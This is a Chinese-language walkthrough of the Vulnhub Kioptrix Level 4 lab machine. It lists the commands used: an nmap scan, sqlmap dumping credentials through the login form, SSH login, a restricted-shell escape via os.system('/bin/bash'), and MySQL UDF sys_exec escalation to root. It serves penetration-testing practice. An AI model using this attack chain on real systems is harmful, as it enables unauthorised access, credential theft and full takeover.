Vulnhub系列-Kioptrix-Level-4

靶机：192.168.249.133
kali:192.168.249.132

一、信息收集

nmap -sV 192.168.249.133 —查看开放端口

—查看下80端口—

—是个登录框可能猜测sql注入漏洞—
—在用户名和密码处*标记，sqlmap跑一下

sqlmap -r 1.txt --level 3 -risk 2 --batch -D members -T members -C password,username --dump—爆出用户名john密码MyNameIsJohn

ssh [email protected]-----得到账号密码,先尝试ssh连接下

----可以连接但发现很多命令没法执行—

二、逃逸受限shell

逃逸linux各种shell执行命令
echo os.system("/bin/bash") –echo命令逃逸受限shell

三、权限提升(mysql udf提权)

uname -a –先查看下内核

–显然可以脏牛提权,但没有gcc—
cat /etc/passwd –查看系统用户配置文件发现john和robert用户默认使用kshell
ps -ef -查看下进程
–发现mysql是root权限–

mysql -u root –root无密码即可登录

–学到了mysql udf提权—
select * from func; –发现有执行命令函数

—可以赋予john用户root权限

select sys_exec('usermod -a -G admin john'); –赋予权限
sudo su –输入john密码即拥有root权限